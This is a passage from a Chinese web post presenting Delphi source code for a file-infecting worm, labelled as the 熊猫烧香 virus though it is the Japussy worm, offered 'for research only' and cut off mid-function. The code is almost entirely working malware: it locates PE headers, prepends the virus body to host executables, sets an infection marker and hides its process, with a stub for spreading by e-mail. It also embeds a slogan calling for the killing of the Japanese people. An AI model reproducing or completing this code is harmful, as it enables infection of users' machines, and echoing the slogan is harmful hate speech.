熊猫烧香 delphi
源代码(仅仅用于研究)OD 分析后,写的源程序 (本文来自本站
原创,转载请务必注明出处!) 熊猫烧香 - 核心源码 Delphi 版本 -----------------------------------仅供研究使用!后果自行負責 代码:
program Japussy; uses Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry}; const HeaderSize = 82432; //病毒体的大小 IconOffset = $12EB8; //PE 文件主图标的偏移量 //在我的
Delphi5 SP1 上面编译得到的大小,其它版本的 Delphi 可能不同 //查找 2800000020 的十六进制字符串可以找到主图标的偏移量 { HeaderSize = 38912; IconOffset = $92BC;
//Upx 压缩过病毒体的大小 //Upx
压缩过 PE 文件主图标的偏移量
//Upx 1.24W 用法: upx -9 --8086 Japussy.exe } IconSize = $2E8; //PE 文件主图标的大小--744 字节 IconTail = IconOffset + IconSize; //PE 文件主图标的尾部 ID = $44444444; //感染标记 //我非常爱你码,以备写入 Catchword = 'If a race need to be killed out, it must be Yamato. ' + 'If a country need to be destroyed, it must be Japan! ' + '*** W32.Japussy.Worm.A ***'; {$R *.RES} function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'Kernel32.dll'; //函数声明 var TmpFile: string; Si: STARTUPINFO; Pi: PROCESS_INFORMATION; IsJap: Boolean = False; //日文操作系统标记 { 判断是否为 Win9x } function IsWin9x: Boolean;
var Ver: TOSVersionInfo; begin Result := False; Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo); if not GetVersionEx(Ver) then Exit; if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x Result := True; end; { 在流之间复制 } procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream; dStartPos: Integer; Count: Integer); var sCurPos, dCurPos: Integer; begin sCurPos := Src.Position; dCurPos := Dst.Position; Src.Seek(sStartPos, 0); Dst.Seek(dStartPos, 0); Dst.CopyFrom(Src, Count); Src.Seek(sCurPos, 0); Dst.Seek(dCurPos, 0); end; { 将宿主文件从已感染的 PE 文件中分离出来,以备使用 } procedure ExtractFile(FileName: string); var sStream, dStream: TFileStream; begin try sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); try dStream := TFileStream.Create(FileName, fmCreate); try sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分 dStream.CopyFrom(sStream, sStream.Size - HeaderSize); finally dStream.Free; end; finally sStream.Free; end; except end;
end; { 填充 STARTUPINFO 结构 } procedure FillStartupInfo(var Si: STARTUPINFO; State: Word); begin Si.cb := SizeOf(Si); Si.lpReserved := nil; Si.lpDesktop := nil; Si.lpTitle := nil; Si.dwFlags := STARTF_USESHOWWINDOW; Si.wShowWindow := State; Si.cbReserved2 := 0; Si.lpReserved2 := nil; end; { 发带毒邮件 } procedure SendMail; begin //哪位仁兄愿意完成之?汤姆感激不尽! end; { 感染 PE 文件 } procedure InfectOneFile(FileName: string); var HdrStream, SrcStream: TFileStream; IcoStream, DstStream: TMemor
yStream; iID: LongInt; aIcon: TIcon; Infected, IsPE: Boolean; i: Integer; Buf: array[0..1] of Char; begin try //出错则文件正在被使用,退出 if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染 Exit; Infected := False; IsPE := False; SrcStream := TFileStream.Create(FileName, fmOpenRead); try for i := 0 to $108 do //检查 PE 文件头 begin
SrcStream.Seek(i, soFromBeginning);
SrcStream.Read(Buf, 2); if (Buf[0] = #80) and (Buf[1] = #69) then //PE 标记 begin IsPE := True; //是 PE 文件 Break; end; end; SrcStream.Seek(-4,